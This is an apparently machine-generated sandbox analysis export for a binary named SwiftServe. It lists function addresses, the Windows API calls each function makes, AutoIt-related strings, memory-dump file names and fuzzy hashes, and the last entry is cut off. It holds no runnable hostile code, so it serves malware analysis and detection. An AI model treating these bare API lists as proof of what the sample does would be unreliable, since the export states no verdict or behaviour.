Function 00EAB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00EAB956
ScreenToClient.USER32(?,?), ref: 00EAB96E
ScreenToClient.USER32(?,?), ref: 00EAB992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00EAB9AD

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: c1f381a1b1ac3198225ea177e158245756a2ee2fddc36b831dd8a112c0268974
Instruction ID: b7e4d3269a9f26cdb09e6076e7cfc9a8f9d9f6780ff38af3af01b8ace474aab3
Opcode Fuzzy Hash: c1f381a1b1ac3198225ea177e158245756a2ee2fddc36b831dd8a112c0268974
Instruction Fuzzy Hash: 771174B9D00209EFDB41CF99C884AEEBBF9FF48310F104156E915E3610D731AA658F50

Function 00EABCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EABCB6
_memset.LIBCMT ref: 00EABCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00EE8F20,00EE8F64), ref: 00EABCF4
CloseHandle.KERNEL32 ref: 00EABD06

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: a0e76db79b91671b9f12443c4bfb7b841bcd283f6d505d72bceee18b8b8e6b65
Instruction ID: d9cb32af9f1b74d12feefad48627cbea0151e8369a1652e9d4bb81303c488637
Opcode Fuzzy Hash: a0e76db79b91671b9f12443c4bfb7b841bcd283f6d505d72bceee18b8b8e6b65
Instruction Fuzzy Hash: 71F054B164035C7FE65027626D46FB73A9DEB09754F001521BA0CF9192DB725C14D7A8

Function 00E87195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00E871A1

Part of subcall function 00E87C7F: _memset.LIBCMT ref: 00E87CB4

_memmove.LIBCMT ref: 00E871C4
_memset.LIBCMT ref: 00E871D1
LeaveCriticalSection.KERNEL32(?), ref: 00E871E1

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: b4c0a0e575aca953e3d58b178326990b287f873af6da2a8feb7495fbd94dfc74
Instruction ID: 099773962948e1f1ccab6e203bf1f56ef0107285543dfa97288a1d7a40cb3dc6
Opcode Fuzzy Hash: b4c0a0e575aca953e3d58b178326990b287f873af6da2a8feb7495fbd94dfc74
Instruction Fuzzy Hash: 2DF03036100104ABCF016F55EC85A4ABB69EF45360F088051FE0C6E22BC731E955DBB4

Function 00EAC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00E216CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E21729
Part of subcall function 00E216CF: SelectObject.GDI32(?,00000000), ref: 00E21738
Part of subcall function 00E216CF: BeginPath.GDI32(?), ref: 00E2174F
Part of subcall function 00E216CF: SelectObject.GDI32(?,00000000), ref: 00E21778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00EAC3E8
LineTo.GDI32(00000000,?,?), ref: 00EAC3F5
EndPath.GDI32(00000000), ref: 00EAC405
StrokePath.GDI32(00000000), ref: 00EAC413

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: a0762f334d2069a67db4d1605feeac669cbaba566219d00211b95f9756eb1899
Instruction ID: c4f706159d837c9c3f0617ff3295ac20d7cefc8525a087cf2e9b5f68b9d8ddd7
Opcode Fuzzy Hash: a0762f334d2069a67db4d1605feeac669cbaba566219d00211b95f9756eb1899
Instruction Fuzzy Hash: 0CF0BE31009269BEDB122F96AC0DFCF3F59AF1A310F048100FA51350E183746658DBA9

Function 00E7AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E7AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7AA82
GetCurrentThreadId.KERNEL32 ref: 00E7AA89
AttachThreadInput.USER32(00000000), ref: 00E7AA90

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 79d052e242324ffd91695b11ef15117c47424ab792e98f885b5b6eab071361ec
Instruction ID: b723ad3abfb97af0b7273699d36c4f57941be7f3a20788304ca6df9e7c65cdab
Opcode Fuzzy Hash: 79d052e242324ffd91695b11ef15117c47424ab792e98f885b5b6eab071361ec
Instruction Fuzzy Hash: ACE03971541228BADB215FA29D0CEEB3F1CEF517A1F048121FA0DA4450C671D554CBA1

Function 00E225F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E2260D
SetTextColor.GDI32(?,000000FF), ref: 00E22617
SetBkMode.GDI32(?,00000001), ref: 00E2262C
GetStockObject.GDI32(00000005), ref: 00E22634
GetWindowDC.USER32(?,00000000), ref: 00E5C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00E5C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00E5C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00E5C203
GetPixel.GDI32(00000000,?,?), ref: 00E5C223
ReleaseDC.USER32(?,00000000), ref: 00E5C22E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 63a5676e28d0e6ec6e4dae953869205f56bad7bd673376ea3d31285f0afd5e14
Instruction ID: c564424c7f91d3333ce783381bcaf3779345a5970fbf4c8e6de4518767e4c3ca
Opcode Fuzzy Hash: 63a5676e28d0e6ec6e4dae953869205f56bad7bd673376ea3d31285f0afd5e14
Instruction Fuzzy Hash: E8E0ED32101244BFDB210FA9BC08BEA3B20EB00336F108366FA68680E183714988CB11

Function 00E79330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00E79339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00E78F04), ref: 00E79340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E78F04), ref: 00E7934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00E78F04), ref: 00E79354

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: a393bbe5da954e38aeb5ed29a292d9c143660e4fe7d4ff1c030d2a087fff8676
Instruction ID: 7bd7e9e41a36d94a6a508734a01c5e1f362ddb3579696fb2e2b404c3c5cf5a7d
Opcode Fuzzy Hash: a393bbe5da954e38aeb5ed29a292d9c143660e4fe7d4ff1c030d2a087fff8676
Instruction Fuzzy Hash: B8E08632601211AFD7602FB25E0DB573BBCEF54795F108C18B245E9091E634A448C750

Function 00E60679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E60679
GetDC.USER32(00000000), ref: 00E60683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E606A3
ReleaseDC.USER32(?), ref: 00E606C4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 71a33c7cce817038cb46a81dc46a7870b577d947dd6b9d33b4cae7e8ed2a6581
Instruction ID: 0341c1d16c03756e67f197076f23b3f9bde0dd77196a12ca2fce6535803d9ca9
Opcode Fuzzy Hash: 71a33c7cce817038cb46a81dc46a7870b577d947dd6b9d33b4cae7e8ed2a6581
Instruction Fuzzy Hash: 95E0E5B1800214EFCB019F61E808A9F7BF1AB88350F119505FC5AB7650CB38A5559F50

Function 00E6068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00E6068D
GetDC.USER32(00000000), ref: 00E60697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E606A3
ReleaseDC.USER32(?), ref: 00E606C4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 801b97f0858d6b1bfbb17330c702c7d43e9e0ef119f6703ebff13e4ce612b808
Instruction ID: 12376fa22f618b7719cff4ce4e18bc9081883bf594c4636b96722f5998b7bcd4
Opcode Fuzzy Hash: 801b97f0858d6b1bfbb17330c702c7d43e9e0ef119f6703ebff13e4ce612b808
Instruction Fuzzy Hash: 3AE01AB1800204AFCB019F71D808A9F7FF1AB8C310F108504FD5AB7250CB38A5558F50

Function 00E7BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00E7C057

Strings

Container, xrefs: 00E7BFD4
AutoIt3GUI, xrefs: 00E7BFCF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: de68e4a3ca46a6c8de1240ec2f9f05dc6f7d83df1ec9b6ee603dfd510a32b5cc
Instruction ID: ea642bb47f4fd8e9e3d82e8f9d43b34df04c1ff9dd55e935c0dff10ac581cfd3
Opcode Fuzzy Hash: de68e4a3ca46a6c8de1240ec2f9f05dc6f7d83df1ec9b6ee603dfd510a32b5cc
Instruction Fuzzy Hash: 3F912770200201AFDB14CF64C885B6ABBF9EF49714F24956EF94AEB291DB71E941CB50

Function 00E8B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00E3436A: _wcscpy.LIBCMT ref: 00E3438D

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

__wcsnicmp.LIBCMT ref: 00E8B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E8B739

Strings

LPT, xrefs: 00E8B66A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 23247d60713ef10edddff4dc37ad1437a9dbb88db6d35359d7cb08c8dc979acd
Instruction ID: efdf9f2ac5d07cbe59f0f3e1ff66b86af30c3e338ce5a31f61e55e655990dfde
Opcode Fuzzy Hash: 23247d60713ef10edddff4dc37ad1437a9dbb88db6d35359d7cb08c8dc979acd
Instruction Fuzzy Hash: AD616E75A00219AFCB14EF94C895EAEB7F4EF48710F01916AF54ABB291D730AE40CB50

Function 00E67190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E67237
_memmove.LIBCMT ref: 00E67291

Strings

#V, xrefs: 00E6730B, 00E6CAB3, 00E6CACF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove
String ID: #V
API String ID: 4104443479-3658881132
Opcode ID: eb15b96a2b56267f7de4b138012770d870ee87cbcca1fc95116d0f28a568e371
Instruction ID: f2e13b5313c0ecf7c17ab772eec570895eff1f9ff3a95fe9b7dccef63a005d1b
Opcode Fuzzy Hash: eb15b96a2b56267f7de4b138012770d870ee87cbcca1fc95116d0f28a568e371
Instruction Fuzzy Hash: C751C370940209DFCF24CFA8D894AEEBBF0FF45348F20552AE89AE7250E731A955CB51

Function 00E2E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00E2E01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 00E2E037

Strings

@, xrefs: 00E2E02B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: a668e3e7cd69b0647919ec2caca035a9157a0eada5b4a0cff3419c8dd63e05f8
Instruction ID: 8a183932070b74b05ef390f5c3ec1a4179228d5b22be9eb1dbf38280ead7eef4
Opcode Fuzzy Hash: a668e3e7cd69b0647919ec2caca035a9157a0eada5b4a0cff3419c8dd63e05f8
Instruction Fuzzy Hash: 0E518CB24087449BE320AF10EC85BAFBBF8FF84314F81485DF1D8511A1DB719469CB16

Function 00EA8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EA8186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EA819B

Strings

', xrefs: 00EA80EF

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: e1d2cd25d508f376977abbc3b52eda8a64393b6385bc4ed4698d0213b17f0f27
Instruction ID: 21dc7fa23d5b8a3ea4a7c5789119a9d36d73376e24cf5336858b7a4d23f16f2d
Opcode Fuzzy Hash: e1d2cd25d508f376977abbc3b52eda8a64393b6385bc4ed4698d0213b17f0f27
Instruction Fuzzy Hash: 34412774A012099FDB14CF69C981BDABBF5FB19300F10116AE948EB351DB30A956CF90

Function 00E92C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E92C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E92CA0

Strings

|, xrefs: 00E92C71

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: d300da329ae7a6933a33c382252f3272c90162ab580d862687e8891acd6969c4
Instruction ID: 76a202700f11c6e8f6ec0d1234ba1402e7f09d237b1a0cad12c61f09e4540c89
Opcode Fuzzy Hash: d300da329ae7a6933a33c382252f3272c90162ab580d862687e8891acd6969c4
Instruction Fuzzy Hash: 1C312871C00219ABCF01EFA1CC85AEEBFB9FF08344F101059F915B6262EB315916DBA0

Function 00EA7088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00EA713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EA7178

Strings

static, xrefs: 00EA70D8

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: fee6ca9518418bb09486598bff2856930db3b39cd6389d3b23ddf7734f7e57a5
Instruction ID: 169570b1ac0cd6307437fb8cba0f346ec752cf87ea1690ef430ba39c340af88c
Opcode Fuzzy Hash: fee6ca9518418bb09486598bff2856930db3b39cd6389d3b23ddf7734f7e57a5
Instruction Fuzzy Hash: 7C316D71100604AEEB10DF68DC80EFB77E9FF89724F10A619F995AB191DA31AC91DB60

Function 00E83049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E830B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E830F3

Strings

0, xrefs: 00E830B1

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5ec52e816857facbeffb460886fd9eb0e8554a5c00b4fa58e7a89bf5bb14019a
Instruction ID: a6283685939128dea8a255f72f6890df56c99b189fe72a3ee028c566d0fba4b0
Opcode Fuzzy Hash: 5ec52e816857facbeffb460886fd9eb0e8554a5c00b4fa58e7a89bf5bb14019a
Instruction Fuzzy Hash: BB3106316012099FEB24EF68D989BEEBBF9EF05F44F145029E88DB61A1D7709B44CB50

Function 00E940B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00E94132

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Strings

, $, xrefs: 00E94172
AUTOITCALLVARIABLE%d, xrefs: 00E94124

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 460606309e17986d9b3f941b9d943efcc50b58c3e9b5a31fa261395262f54767
